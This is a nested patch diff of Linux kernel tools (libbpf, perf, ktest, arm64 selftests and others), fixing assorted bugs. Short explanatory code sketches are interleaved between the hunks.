+-			    bpf_map_update_elem(map_fd, &profile_perf_event_cnt,
+-						&pmu_fd, BPF_ANY) ||
+-			    ioctl(pmu_fd, PERF_EVENT_IOC_ENABLE, 0)) {
++			if (profile_open_perf_event(m, cpu, map_fd)) {
+ 				p_err("failed to create event %s on cpu %d",
+ 				      metrics[m].name, cpu);
+ 				return -1;
+ 			}
+-			profile_perf_events[profile_perf_event_cnt++] = pmu_fd;
+ 		}
+ 	}
+ 	return 0;
+diff --git a/tools/lib/bpf/bpf_tracing.h b/tools/lib/bpf/bpf_tracing.h
+index 2972dc25ff722..9c1b1689068d1 100644
+--- a/tools/lib/bpf/bpf_tracing.h
++++ b/tools/lib/bpf/bpf_tracing.h
+@@ -137,7 +137,7 @@ struct pt_regs___s390 {
+ #define __PT_PARM3_REG gprs[4]
+ #define __PT_PARM4_REG gprs[5]
+ #define __PT_PARM5_REG gprs[6]
+-#define __PT_RET_REG grps[14]
++#define __PT_RET_REG gprs[14]
+ #define __PT_FP_REG gprs[11]	/* Works only with CONFIG_FRAME_POINTER */
+ #define __PT_RC_REG gprs[2]
+ #define __PT_SP_REG gprs[15]
+diff --git a/tools/lib/bpf/btf.c b/tools/lib/bpf/btf.c
+index 71e165b09ed59..8cbcef959456d 100644
+--- a/tools/lib/bpf/btf.c
++++ b/tools/lib/bpf/btf.c
+@@ -688,8 +688,21 @@ int btf__align_of(const struct btf *btf, __u32 id)
+ 			if (align <= 0)
+ 				return libbpf_err(align);
+ 			max_align = max(max_align, align);
++
++			/* if field offset isn't aligned according to field
++			 * type's alignment, then struct must be packed
++			 */
++			if (btf_member_bitfield_size(t, i) == 0 &&
++			    (m->offset % (8 * align)) != 0)
++				return 1;
+ 		}
+ 
++		/* if struct/union size isn't a multiple of its alignment,
++		 * then struct must be packed
++		 */
++		if ((t->size % max_align) != 0)
++			return 1;
++
+ 		return max_align;
+ 	}
+ 	default:
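Both new btf__align_of() heuristics can be sanity-checked against the compiler: each struct below has a layout that only a packed struct can have, one per rule.

#include <stdio.h>

struct misaligned_member {	/* rule 1: member offset not aligned */
	char a;
	int b;			/* offset 1, but alignof(int) is 4 */
} __attribute__((packed));

struct odd_size {		/* rule 2: size % max alignment != 0 */
	int a;
	char b;			/* sizeof is 5, max alignment is 4 */
} __attribute__((packed));

int main(void)
{
	printf("%zu %zu\n", sizeof(struct misaligned_member),
	       sizeof(struct odd_size));	/* prints: 5 5 */
	return 0;
}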
+diff --git a/tools/lib/bpf/btf_dump.c b/tools/lib/bpf/btf_dump.c
+index deb2bc9a0a7b0..69e80ee5f70e2 100644
+--- a/tools/lib/bpf/btf_dump.c
++++ b/tools/lib/bpf/btf_dump.c
+@@ -959,9 +959,12 @@ static void btf_dump_emit_struct_def(struct btf_dump *d,
+ 	 * Keep `struct empty {}` on a single line,
+ 	 * only print newline when there are regular or padding fields.
+ 	 */
+-	if (vlen || t->size)
++	if (vlen || t->size) {
+ 		btf_dump_printf(d, "\n");
+-	btf_dump_printf(d, "%s}", pfx(lvl));
++		btf_dump_printf(d, "%s}", pfx(lvl));
++	} else {
++		btf_dump_printf(d, "}");
++	}
+ 	if (packed)
+ 		btf_dump_printf(d, " __attribute__((packed))");
+ }
+diff --git a/tools/lib/bpf/libbpf.c b/tools/lib/bpf/libbpf.c
+index 2a82f49ce16f3..adf818da35dda 100644
+--- a/tools/lib/bpf/libbpf.c
++++ b/tools/lib/bpf/libbpf.c
+@@ -7355,7 +7355,7 @@ static int bpf_object__sanitize_maps(struct bpf_object *obj)
+ 		if (!bpf_map__is_internal(m))
+ 			continue;
+ 		if (!kernel_supports(obj, FEAT_ARRAY_MMAP))
+-			m->def.map_flags ^= BPF_F_MMAPABLE;
++			m->def.map_flags &= ~BPF_F_MMAPABLE;
+ 	}
+ 
+ 	return 0;
+diff --git a/tools/lib/bpf/nlattr.c b/tools/lib/bpf/nlattr.c
+index 3900d052ed19e..975e265eab3bf 100644
+--- a/tools/lib/bpf/nlattr.c
++++ b/tools/lib/bpf/nlattr.c
+@@ -178,7 +178,7 @@ int libbpf_nla_dump_errormsg(struct nlmsghdr *nlh)
+ 		hlen += nlmsg_len(&err->msg);
+ 
+ 	attr = (struct nlattr *) ((void *) err + hlen);
+-	alen = nlh->nlmsg_len - hlen;
++	alen = (void *)nlh + nlh->nlmsg_len - (void *)attr;
+ 
+ 	if (libbpf_nla_parse(tb, NLMSGERR_ATTR_MAX, attr, alen,
+ 			     extack_policy) != 0) {
+diff --git a/tools/lib/thermal/sampling.c b/tools/lib/thermal/sampling.c
+index ee818f4e9654d..70577423a9f0c 100644
+--- a/tools/lib/thermal/sampling.c
++++ b/tools/lib/thermal/sampling.c
+@@ -54,7 +54,7 @@ int thermal_sampling_fd(struct thermal_handler *th)
+ thermal_error_t thermal_sampling_exit(struct thermal_handler *th)
+ {
+ 	if (nl_unsubscribe_thermal(th->sk_sampling, th->cb_sampling,
+-				   THERMAL_GENL_EVENT_GROUP_NAME))
++				   THERMAL_GENL_SAMPLING_GROUP_NAME))
+ 		return THERMAL_ERROR;
+ 
+ 	nl_thermal_disconnect(th->sk_sampling, th->cb_sampling);
+diff --git a/tools/objtool/check.c b/tools/objtool/check.c
+index 4b7c8b33069e5..b1a5f658673f0 100644
+--- a/tools/objtool/check.c
++++ b/tools/objtool/check.c
+@@ -1186,6 +1186,8 @@ static const char *uaccess_safe_builtin[] = {
+ 	"__tsan_atomic64_compare_exchange_val",
+ 	"__tsan_atomic_thread_fence",
+ 	"__tsan_atomic_signal_fence",
++	"__tsan_unaligned_read16",
++	"__tsan_unaligned_write16",
+ 	/* KCOV */
+ 	"write_comp_data",
+ 	"check_kcov_mode",
+diff --git a/tools/perf/Documentation/perf-intel-pt.txt b/tools/perf/Documentation/perf-intel-pt.txt
+index 7b6ccd2fa3bf1..9d485a9cdb198 100644
+--- a/tools/perf/Documentation/perf-intel-pt.txt
++++ b/tools/perf/Documentation/perf-intel-pt.txt
+@@ -1821,6 +1821,36 @@ Can be compiled and traced:
+  $
+ 
+ 
++Pipe mode
++---------
++Pipe mode is a problem for Intel PT and possibly other auxtrace users.
++Using a pipe as data output with Intel PT is not recommended, for the
++reasons explained below.
++
++Essentially the auxtrace buffers do not behave like the regular perf
++event buffers.  That is because the head and tail are updated by
++software, but in the auxtrace case the data is written by hardware.
++So the head and tail do not get updated as data is written.
++
++In the Intel PT case, the head and tail are updated only when the trace
++is disabled by software, for example:
++    - full-trace, system wide : when buffer passes watermark
++    - full-trace, not system-wide : when buffer passes watermark or
++                                    context switches
++    - snapshot mode : as above but also when a snapshot is made
++    - sample mode : as above but also when a sample is made
++
++That means finished-round ordering doesn't work.  An auxtrace buffer
++can turn up that has data that extends back in time, possibly to the
++very beginning of tracing.
++
++For a perf.data file, that problem is solved by going through the trace
++and queuing up the auxtrace buffers in advance.
++
++For pipe mode there is no such solution, so the order of events and
++timestamps can end up wrong.
++
++
+ EXAMPLE
+ -------
+ 
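The head/tail pair the new documentation describes lives in the control page that perf mmaps into user space; a hedged sketch of how a reader discovers available AUX data (simplified, ignoring wrap-around and the matching tail update):

#include <linux/perf_event.h>
#include <stdint.h>

/*
 * For Intel PT, aux_head advances only when the trace is disabled,
 * not continuously as the hardware writes, which is exactly why
 * finished-round ordering cannot be assumed for piped output.
 */
static uint64_t aux_bytes_ready(const struct perf_event_mmap_page *pc)
{
	uint64_t head = __atomic_load_n(&pc->aux_head, __ATOMIC_ACQUIRE);

	return head - pc->aux_tail;
}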
+diff --git a/tools/perf/builtin-inject.c b/tools/perf/builtin-inject.c
+index 3f4e4dd5abf31..f8182417b7341 100644
+--- a/tools/perf/builtin-inject.c
++++ b/tools/perf/builtin-inject.c
+@@ -215,14 +215,14 @@ static int perf_event__repipe_event_update(struct perf_tool *tool,
+ 
+ #ifdef HAVE_AUXTRACE_SUPPORT
+ 
+-static int copy_bytes(struct perf_inject *inject, int fd, off_t size)
++static int copy_bytes(struct perf_inject *inject, struct perf_data *data, off_t size)
+ {
+ 	char buf[4096];
+ 	ssize_t ssz;
+ 	int ret;
+ 
+ 	while (size > 0) {
+-		ssz = read(fd, buf, min(size, (off_t)sizeof(buf)));
++		ssz = perf_data__read(data, buf, min(size, (off_t)sizeof(buf)));
+ 		if (ssz < 0)
+ 			return -errno;
+ 		ret = output_bytes(inject, buf, ssz);
+@@ -260,7 +260,7 @@ static s64 perf_event__repipe_auxtrace(struct perf_session *session,
+ 		ret = output_bytes(inject, event, event->header.size);
+ 		if (ret < 0)
+ 			return ret;
+-		ret = copy_bytes(inject, perf_data__fd(session->data),
++		ret = copy_bytes(inject, session->data,
+ 				 event->auxtrace.size);
+ 	} else {
+ 		ret = output_bytes(inject, event,
+diff --git a/tools/perf/builtin-record.c b/tools/perf/builtin-record.c
+index 29dcd454b8e21..8374117e66f6e 100644
+--- a/tools/perf/builtin-record.c
++++ b/tools/perf/builtin-record.c
+@@ -154,6 +154,7 @@ struct record {
+ 	struct perf_tool	tool;
+ 	struct record_opts	opts;
+ 	u64			bytes_written;
++	u64			thread_bytes_written;
+ 	struct perf_data	data;
+ 	struct auxtrace_record	*itr;
+ 	struct evlist	*evlist;
+@@ -226,14 +227,7 @@ static bool switch_output_time(struct record *rec)
+ 
+ static u64 record__bytes_written(struct record *rec)
+ {
+-	int t;
+-	u64 bytes_written = rec->bytes_written;
+-	struct record_thread *thread_data = rec->thread_data;
+-
+-	for (t = 0; t < rec->nr_threads; t++)
+-		bytes_written += thread_data[t].bytes_written;
+-
+-	return bytes_written;
++	return rec->bytes_written + rec->thread_bytes_written;
+ }
+ 
+ static bool record__output_max_size_exceeded(struct record *rec)
+@@ -255,10 +249,12 @@ static int record__write(struct record *rec, struct mmap *map __maybe_unused,
+ 		return -1;
+ 	}
+ 
+-	if (map && map->file)
++	if (map && map->file) {
+ 		thread->bytes_written += size;
+-	else
++		rec->thread_bytes_written += size;
++	} else {
+ 		rec->bytes_written += size;
++	}
+ 
+ 	if (record__output_max_size_exceeded(rec) && !done) {
+ 		fprintf(stderr, "[ perf record: perf size limit reached (%" PRIu64 " KB),"
+diff --git a/tools/perf/perf-completion.sh b/tools/perf/perf-completion.sh
+index fdf75d45efff7..978249d7868c2 100644
+--- a/tools/perf/perf-completion.sh
++++ b/tools/perf/perf-completion.sh
+@@ -165,7 +165,12 @@ __perf_main ()
+ 
+ 		local cur1=${COMP_WORDS[COMP_CWORD]}
+ 		local raw_evts=$($cmd list --raw-dump)
+-		local arr s tmp result
++		local arr s tmp result cpu_evts
++
++		# aarch64 doesn't have /sys/bus/event_source/devices/cpu/events
++		if [[ `uname -m` != aarch64 ]]; then
++			cpu_evts=$(ls /sys/bus/event_source/devices/cpu/events)
++		fi
+ 
+ 		if [[ "$cur1" == */* && ${cur1#*/} =~ ^[A-Z] ]]; then
+ 			OLD_IFS="$IFS"
+@@ -183,9 +188,9 @@ __perf_main ()
+ 				fi
+ 			done
+ 
+-			evts=${result}" "$(ls /sys/bus/event_source/devices/cpu/events)
++			evts=${result}" "${cpu_evts}
+ 		else
+-			evts=${raw_evts}" "$(ls /sys/bus/event_source/devices/cpu/events)
++			evts=${raw_evts}" "${cpu_evts}
+ 		fi
+ 
+ 		if [[ "$cur1" == , ]]; then
+diff --git a/tools/perf/pmu-events/metric_test.py b/tools/perf/pmu-events/metric_test.py
+index 15315d0f716ca..6980f452df0ad 100644
+--- a/tools/perf/pmu-events/metric_test.py
++++ b/tools/perf/pmu-events/metric_test.py
+@@ -87,8 +87,8 @@ class TestMetricExpressions(unittest.TestCase):
+     after = r'min((a + b if c > 1 else c + d), e + f)'
+     self.assertEqual(ParsePerfJson(before).ToPerfJson(), after)
+ 
+-    before =3D r'a if b else c if d else e'
+-    after =3D r'(a if b else (c if d else e))'
++    before = r'a if b else c if d else e'
++    after = r'(a if b else (c if d else e))'
+     self.assertEqual(ParsePerfJson(before).ToPerfJson(), after)
+ 
+   def test_ToPython(self):
+diff --git a/tools/perf/tests/bpf.c b/tools/perf/tests/bpf.c
+index 17c023823713d..6a4235a9cf57e 100644
+--- a/tools/perf/tests/bpf.c
++++ b/tools/perf/tests/bpf.c
+@@ -126,6 +126,10 @@ static int do_test(struct bpf_object *obj, int (*func)(void),
+ 
+ 	err = parse_events_load_bpf_obj(&parse_state, &parse_state.list, obj, NULL);
+ 	parse_events_error__exit(&parse_error);
++	if (err == -ENODATA) {
++		pr_debug("Failed to add events selected by BPF, debuginfo package not installed\n");
++		return TEST_SKIP;
++	}
+ 	if (err || list_empty(&parse_state.list)) {
+ 		pr_debug("Failed to add events selected by BPF\n");
+ 		return TEST_FAIL;
+@@ -368,7 +372,7 @@ static struct test_case bpf_tests[] = {
+ 			"clang isn't installed or environment missing BPF support"),
+ #ifdef HAVE_BPF_PROLOGUE
+ 	TEST_CASE_REASON("BPF prologue generation", bpf_prologue_test,
+-			"clang isn't installed or environment missing BPF support"),
++			"clang/debuginfo isn't installed or environment missing BPF support"),
+ #else
+ 	TEST_CASE_REASON("BPF prologue generation", bpf_prologue_test, "not compiled in"),
+ #endif
+diff --git a/tools/perf/tests/shell/stat_all_metrics.sh b/tools/perf/tests/shell/stat_all_metrics.sh
+index 6e79349e42bef..22e9cb294b40e 100755
+--- a/tools/perf/tests/shell/stat_all_metrics.sh
++++ b/tools/perf/tests/shell/stat_all_metrics.sh
+@@ -11,7 +11,7 @@ for m in $(perf list --raw-dump metrics); do
+     continue
+   fi
+   # Failed so try system wide.
+-  result=$(perf stat -M "$m" -a true 2>&1)
++  result=$(perf stat -M "$m" -a sleep 0.01 2>&1)
+   if [[ "$result" =~ "${m:0:50}" ]]
+   then
+     continue
+diff --git a/tools/perf/util/auxtrace.c b/tools/perf/util/auxtrace.c
+index c2e323cd7d496..d4b04fa07a119 100644
+--- a/tools/perf/util/auxtrace.c
++++ b/tools/perf/util/auxtrace.c
+@@ -1133,6 +1133,9 @@ int auxtrace_queue_data(struct perf_session *session, bool samples, bool events)
+ 	if (auxtrace__dont_decode(session))
+ 		return 0;
+ 
++	if (perf_data__is_pipe(session->data))
++		return 0;
++
+ 	if (!session->auxtrace || !session->auxtrace->queue_data)
+ 		return -EINVAL;
+ 
+diff --git a/tools/perf/util/intel-pt.c b/tools/perf/util/intel-pt.c
+index 6d3921627e332..b8b29756fbf13 100644
+--- a/tools/perf/util/intel-pt.c
++++ b/tools/perf/util/intel-pt.c
+@@ -4379,6 +4379,12 @@ int intel_pt_process_auxtrace_info(union perf_event *event,
+ 
+ 	intel_pt_setup_pebs_events(pt);
+ 
++	if (perf_data__is_pipe(session->data)) {
++		pr_warning("WARNING: Intel PT with pipe mode is not recommended.\n"
++			   "         The output cannot be relied upon.  In particular,\n"
++			   "         timestamps and the order of events may be incorrect.\n");
++	}
++
+ 	if (pt->sampling_mode || list_empty(&session->auxtrace_index))
+ 		err = auxtrace_queue_data(session, true, true);
+ 	else
+diff --git a/tools/perf/util/llvm-utils.c b/tools/perf/util/llvm-utils.c
+index 650ffe336f3aa..4e8e243a6e4bd 100644
+--- a/tools/perf/util/llvm-utils.c
++++ b/tools/perf/util/llvm-utils.c
+@@ -531,14 +531,37 @@ int llvm__compile_bpf(const char *path, void **p_obj_buf,
+ 
+ 	pr_debug("llvm compiling command template: %s\n", template);
+ 
++	/*
++	 * Below, substitute control characters for values that can cause the
++	 * echo to misbehave, then substitute the values back.
++	 */
+ 	err = -ENOMEM;
+-	if (asprintf(&command_echo, "echo -n \"%s\"", template) < 0)
++	if (asprintf(&command_echo, "echo -n \a%s\a", template) < 0)
+ 		goto errout;
+ 
++#define SWAP_CHAR(a, b) do { if (*p == a) *p = b; } while (0)
++	for (char *p = command_echo; *p; p++) {
++		SWAP_CHAR('<', '\001');
++		SWAP_CHAR('>', '\002');
++		SWAP_CHAR('"', '\003');
++		SWAP_CHAR('\'', '\004');
++		SWAP_CHAR('|', '\005');
++		SWAP_CHAR('&', '\006');
++		SWAP_CHAR('\a', '"');
++	}
+ 	err = read_from_pipe(command_echo, (void **) &command_out, NULL);
+ 	if (err)
+ 		goto errout;
+ 
++	for (char *p = command_out; *p; p++) {
++		SWAP_CHAR('\001', '<');
++		SWAP_CHAR('\002', '>');
++		SWAP_CHAR('\003', '"');
++		SWAP_CHAR('\004', '\'');
++		SWAP_CHAR('\005', '|');
++		SWAP_CHAR('\006', '&');
++	}
++#undef SWAP_CHAR
+ 	pr_debug("llvm compiling command : %s\n", command_out);
+ 
+ 	err = read_from_pipe(template, &obj_buf, &obj_buf_sz);
+diff --git a/tools/perf/util/stat-display.c b/tools/perf/util/stat-display.c
+index 8bd8b0142630c..1b5cb20efd237 100644
+--- a/tools/perf/util/stat-display.c
++++ b/tools/perf/util/stat-display.c
+@@ -787,6 +787,51 @@ static void uniquify_counter(struct perf_stat_config *config, struct evsel *coun
+ 		uniquify_event_name(counter);
+ }
+ 
++/**
++ * should_skip_zero_count() - Check if the event should print 0 values.
++ * @config: The perf stat configuration (including aggregation mode).
++ * @counter: The evsel with its associated cpumap.
++ * @id: The aggregation id that is being queried.
++ *
++ * Due to a mismatch between the event cpumap or thread-map and the
++ * aggregation mode, the counter is sometimes iterated with a map
++ * which does not contain any values.
++ *
++ * For example, uncore events have dedicated CPUs to manage them;
++ * results for other CPUs should be zero and are skipped.
++ *
++ * Return: %true if the value should NOT be printed, %false if the value
++ * needs to be printed like "<not counted>" or "<not supported>".
++ */
++static bool should_skip_zero_counter(struct perf_stat_config *config,
++				     struct evsel *counter,
++				     const struct aggr_cpu_id *id)
++{
++	struct perf_cpu cpu;
++	int idx;
++
++	/*
++	 * Skip value 0 when enabling --per-thread globally,
++	 * otherwise it will have too many 0 output.
++	 */
++	if (config->aggr_mode == AGGR_THREAD && config->system_wide)
++		return true;
++	/*
++	 * Skip value 0 when it's an uncore event and the given aggr id
++	 * does not belong to the PMU cpumask.
++	 */
++	if (!counter->pmu || !counter->pmu->is_uncore)
++		return false;
++
++	perf_cpu_map__for_each_cpu(cpu, idx, counter->pmu->cpus) {
++		struct aggr_cpu_id own_id = config->aggr_get_id(config, cpu);
++
++		if (aggr_cpu_id__equal(id, &own_id))
++			return false;
++	}
++	return true;
++}
++
+ static void print_counter_aggrdata(struct perf_stat_config *config,
+ 				   struct evsel *counter, int s,
+ 				   struct outstate *os)
+@@ -814,11 +859,7 @@ static void print_counter_aggrdata(struct perf_stat_config *config,
+ 	ena = aggr->counts.ena;
+ 	run = aggr->counts.run;
+ 
+-	/*
+-	 * Skip value 0 when enabling --per-thread globally, otherwise it will
+-	 * have too many 0 output.
+-	 */
+-	if (val == 0 && config->aggr_mode == AGGR_THREAD && config->system_wide)
++	if (val == 0 && should_skip_zero_counter(config, counter, &id))
+ 		return;
+ 
+ 	if (!metric_only) {
+diff --git a/tools/perf/util/stat-shadow.c b/tools/perf/util/stat-shadow.c
+index cadb2df23c878..4cd05d9205e3b 100644
+--- a/tools/perf/util/stat-shadow.c
++++ b/tools/perf/util/stat-shadow.c
+@@ -311,7 +311,7 @@ void perf_stat__update_shadow_stats(struct evsel *counter, u64 count,
+ 		update_stats(&v->stats, count);
+ 		if (counter->metric_leader)
+ 			v->metric_total += count;
+-	} else if (counter->metric_leader) {
++	} else if (counter->metric_leader && !counter->merged_stat) {
+ 		v = saved_value_lookup(counter->metric_leader,
+ 				       map_idx, true, STAT_NONE, 0, st, rsd.cgrp);
+ 		v->metric_total += count;
+diff --git a/tools/power/x86/intel-speed-select/isst-config.c b/tools/power/x86/intel-speed-select/isst-config.c
+index a160bad291eb7..be3668d37d654 100644
+--- a/tools/power/x86/intel-speed-select/isst-config.c
++++ b/tools/power/x86/intel-speed-select/isst-config.c
+@@ -110,7 +110,7 @@ int is_skx_based_platform(void)
+ 
+ int is_spr_platform(void)
+ {
+-	if (cpu_model == 0x8F)
++	if (cpu_model == 0x8F || cpu_model == 0xCF)
+ 		return 1;
+ 
+ 	return 0;
+diff --git a/tools/testing/ktest/ktest.pl b/tools/testing/ktest/ktest.pl
+index ac59999ed3ded..822794ca40292 100755
+--- a/tools/testing/ktest/ktest.pl
++++ b/tools/testing/ktest/ktest.pl
+@@ -178,6 +178,7 @@ my $store_failures;
+ my $store_successes;
+ my $test_name;
+ my $timeout;
++my $run_timeout;
+ my $connect_timeout;
+ my $config_bisect_exec;
+ my $booted_timeout;
+@@ -340,6 +341,7 @@ my %option_map = (
+     "STORE_SUCCESSES"		=> \$store_successes,
+     "TEST_NAME"			=> \$test_name,
+     "TIMEOUT"			=> \$timeout,
++    "RUN_TIMEOUT"		=> \$run_timeout,
+     "CONNECT_TIMEOUT"		=> \$connect_timeout,
+     "CONFIG_BISECT_EXEC"	=> \$config_bisect_exec,
+     "BOOTED_TIMEOUT"		=> \$booted_timeout,
+@@ -1495,7 +1497,8 @@ sub reboot {
+ 
+ 	# Still need to wait for the reboot to finish
+ 	wait_for_monitor($time, $reboot_success_line);
+-
++    }
++    if ($powercycle || $time) {
+ 	end_monitor;
+     }
+ }
+@@ -1857,6 +1860,14 @@ sub run_command {
+     $command =~ s/\$SSH_USER/$ssh_user/g;
+     $command =~ s/\$MACHINE/$machine/g;
+ 
++    if (!defined($timeout)) {
++	$timeout = $run_timeout;
++    }
++
++    if (!defined($timeout)) {
++	$timeout = -1; # tell wait_for_input to wait indefinitely
++    }
++
+     doprint("$command ... ");
+     $start_time = time;
+ 
+@@ -1883,13 +1894,10 @@ sub run_command {
+ 
+     while (1) {
+ 	my $fp = \*CMD;
+-	if (defined($timeout)) {
+-	    doprint "timeout = $timeout\n";
+-	}
+ 	my $line = wait_for_input($fp, $timeout);
+ 	if (!defined($line)) {
+ 	    my $now = time;
+-	    if (defined($timeout) && (($now - $start_time) >= $timeout)) {
++	    if ($timeout >= 0 && (($now - $start_time) >= $timeout)) {
+ 		doprint "Hit timeout of $timeout, killing process\n";
+ 		$hit_timeout = 1;
+ 		kill 9, $pid;
+@@ -2061,6 +2069,11 @@ sub wait_for_input {
+ 	$time = $timeout;
+     }
+ 
++    if ($time < 0) {
++	# Negative number means wait indefinitely
++	undef $time;
++    }
++
+     $rin = '';
+     vec($rin, fileno($fp), 1) = 1;
+     vec($rin, fileno(\*STDIN), 1) = 1;
+@@ -4200,6 +4213,9 @@ sub send_email {
+ }
+ 
+ sub cancel_test {
++    if ($monitor_cnt) {
++	end_monitor;
++    }
+     if ($email_when_canceled) {
+ 	my $name = get_test_name;
+ 	send_email("KTEST: Your [$name] test was cancelled",
+diff --git a/tools/testing/ktest/sample.conf b/tools/testing/ktest/sample.conf
+index 2d0fe15a096dd..f43477a9b8574 100644
+--- a/tools/testing/ktest/sample.conf
++++ b/tools/testing/ktest/sample.conf
+@@ -817,6 +817,11 @@
+ # is issued instead of a reboot.
+ # CONNECT_TIMEOUT = 25
+ 
++# The timeout in seconds for how long to wait for any running command
++# to complete. If not defined, commands may run indefinitely.
++# (default undefined)
++#RUN_TIMEOUT = 600
++
+ # In between tests, a reboot of the box may occur, and this
+ # is the time to wait for the console after it stops producing
+ # output. Some machines may not produce a large lag on reboot
+diff --git a/tools/testing/selftests/Makefile b/tools/testing/selftests/Makefile
+index 41b649452560c..06578963f4f1d 100644
+--- a/tools/testing/selftests/Makefile
++++ b/tools/testing/selftests/Makefile
+@@ -236,8 +236,8 @@ ifdef INSTALL_PATH
+ 	@# included in the generated runlist.
+ 	for TARGET in $(TARGETS); do \
+ 		BUILD_TARGET=$$BUILD/$$TARGET;	\
+-		[ ! -d $(INSTALL_PATH)/$$TARGET ] && echo "Skipping non-existent dir: $$TARGET" && continue; \
+-		echo -ne "Emit Tests for $$TARGET\n"; \
++		[ ! -d $(INSTALL_PATH)/$$TARGET ] && printf "Skipping non-existent dir: $$TARGET\n" && continue; \
++		printf "Emit Tests for $$TARGET\n"; \
+ 		$(MAKE) -s --no-print-directory OUTPUT=$$BUILD_TARGET COLLECTION=$$TARGET \
+ 			-C $$TARGET emit_tests >> $(TEST_LIST); \
+ 	done;
+diff --git a/tools/testing/selftests/arm64/abi/syscall-abi.c b/tools/testing/selftests/arm64/abi/syscall-abi.c
+index dd7ebe536d05f..ffe719b50c215 100644
+--- a/tools/testing/selftests/arm64/abi/syscall-abi.c
++++ b/tools/testing/selftests/arm64/abi/syscall-abi.c
+@@ -390,6 +390,10 @@ static void test_one_syscall(struct syscall_cfg *cfg)
+ 
+ 			sme_vl &= PR_SME_VL_LEN_MASK;
+ 
++			/* Found lowest VL */
++			if (sve_vq_from_vl(sme_vl) > sme_vq)
++				break;
++
+ 			if (sme_vq != sve_vq_from_vl(sme_vl))
+ 				sme_vq = sve_vq_from_vl(sme_vl);
+ 
+@@ -461,6 +465,10 @@ int sme_count_vls(void)
+ 
+ 		vl &= PR_SME_VL_LEN_MASK;
+ 
++		/* Found lowest VL */
++		if (sve_vq_from_vl(vl) > vq)
++			break;
++
+ 		if (vq != sve_vq_from_vl(vl))
+ 			vq = sve_vq_from_vl(vl);
+ 
+diff --git a/tools/testing/selftests/arm64/fp/Makefile b/tools/testing/selftests/arm64/fp/Makefile
+index 36db61358ed5b..932ec8792316d 100644
+--- a/tools/testing/selftests/arm64/fp/Makefile
++++ b/tools/testing/selftests/arm64/fp/Makefile
+@@ -3,7 +3,7 @@
+ # A proper top_srcdir is needed by KSFT(lib.mk)
+ top_srcdir = $(realpath ../../../../../)
+ 
+-CFLAGS += -I$(top_srcdir)/usr/include/
++CFLAGS += $(KHDR_INCLUDES)
+ 
+ TEST_GEN_PROGS := fp-stress \
+ 	sve-ptrace sve-probe-vls \
+diff --git a/tools/testing/selftests/arm64/signal/testcases/ssve_regs.c b/tools/testing/selftests/arm64/signal/testcases/ssve_regs.c
+index d0a178945b1a8..c6b17c47cac4c 100644
+--- a/tools/testing/selftests/arm64/signal/testcases/ssve_regs.c
++++ b/tools/testing/selftests/arm64/signal/testcases/ssve_regs.c
+@@ -34,6 +34,10 @@ static bool sme_get_vls(struct tdescr *td)
+ 
+ 		vl &= PR_SME_VL_LEN_MASK;
+ 
++		/* Did we find the lowest supported VL? */
++		if (vq < sve_vq_from_vl(vl))
++			break;
++
+ 		/* Skip missing VLs */
+ 		vq = sve_vq_from_vl(vl);
+ 
+diff --git a/tools/testing/selftests/arm64/signal/testcases/za_regs.c b/tools/testing/selftests/arm64/signal/testcases/za_regs.c
+index ea45acb115d5b..174ad66566964 100644
+--- a/tools/testing/selftests/arm64/signal/testcases/za_regs.c
++++ b/tools/testing/selftests/arm64/signal/testcases/za_regs.c
+@@ -34,6 +34,10 @@ static bool sme_get_vls(struct tdescr *td)
+ 
+ 		vl &= PR_SME_VL_LEN_MASK;
+ 
++		/* Did we find the lowest supported VL? */
++		if (vq < sve_vq_from_vl(vl))
++			break;
++
+ 		/* Skip missing VLs */
+ 		vq = sve_vq_from_vl(vl);
+ 
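The four arm64 hunks (syscall-abi and the two signal tests) fix the same enumeration loop: PR_SME_SET_VL clamps an unsupported request to the nearest supported vector length, and once the request drops below the hardware minimum the clamp goes upward, so without a break the loop re-tests the lowest VL forever. A hedged userspace sketch, with constants mirrored from the prctl UAPI and the selftest helpers:

#include <sys/prctl.h>

#ifndef PR_SME_SET_VL
#define PR_SME_SET_VL		63
#endif
#ifndef PR_SME_VL_LEN_MASK
#define PR_SME_VL_LEN_MASK	0xffff
#endif
#define sve_vq_from_vl(vl)	((vl) / 16)	/* 16 bytes per quantum */

static int count_supported_vls(void)
{
	int vq, vl, count = 0;

	for (vq = 512; vq > 0; --vq) {		/* 512 == SVE_VQ_MAX */
		vl = prctl(PR_SME_SET_VL, vq * 16);
		if (vl == -1)
			return -1;
		vl &= PR_SME_VL_LEN_MASK;

		/* Clamped upward: lowest VL already counted, stop. */
		if (sve_vq_from_vl(vl) > vq)
			break;

		vq = sve_vq_from_vl(vl);	/* skip unsupported VQs */
		count++;
	}
	return count;
}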
+diff --git a/tools/testing/selftests/arm64/tags/Makefile b/tools/testing/selftests/arm64/tags/Makefile
+index 41cb750705117..6d29cfde43a21 100644
+--- a/tools/testing/selftests/arm64/tags/Makefile
++++ b/tools/testing/selftests/arm64/tags/Makefile
+@@ -1,6 +1,6 @@
+ # SPDX-License-Identifier: GPL-2.0
+ 
+-CFLAGS += -I../../../../../usr/include/
++CFLAGS += $(KHDR_INCLUDES)
+ TEST_GEN_PROGS := tags_test
+ TEST_PROGS := run_tags_test.sh
+ 
+diff --git a/tools/testing/selftests/bpf/Makefile b/tools/testing/selftests/bpf/Makefile
+index c22c43bbee194..43c559b7729b5 100644
+--- a/tools/testing/selftests/bpf/Makefile
++++ b/tools/testing/selftests/bpf/Makefile
+@@ -149,8 +149,6 @@ endif
+ # NOTE: Semicolon at the end is critical to override lib.mk's default static
+ # rule for binaries.
+ $(notdir $(TEST_GEN_PROGS)						\
+-	 $(TEST_PROGS)							\
+-	 $(TEST_PROGS_EXTENDED)						\
+ 	 $(TEST_GEN_PROGS_EXTENDED)					\
+ 	 $(TEST_CUSTOM_PROGS)): %: $(OUTPUT)/% ;
+ 
+@@ -181,14 +179,15 @@ endif
+ # do not fail. Static builds leave urandom_read relying on system-wide shared libraries.
+ $(OUTPUT)/liburandom_read.so: urandom_read_lib1.c urandom_read_lib2.c
+ 	$(call msg,LIB,,$@)
+-	$(Q)$(CLANG) $(filter-out -static,$(CFLAGS) $(LDFLAGS)) $^ $(LDLIBS)   \
++	$(Q)$(CLANG) $(filter-out -static,$(CFLAGS) $(LDFLAGS))   \
++		     $^ $(filter-out -static,$(LDLIBS))	     \
+ 		     -fuse-ld=$(LLD) -Wl,-znoseparate-code -Wl,--build-id=sha1 \
+ 		     -fPIC -shared -o $@
+ 
+ $(OUTPUT)/urandom_read: urandom_read.c urandom_read_aux.c $(OUTPUT)/liburandom_read.so
+ 	$(call msg,BINARY,,$@)
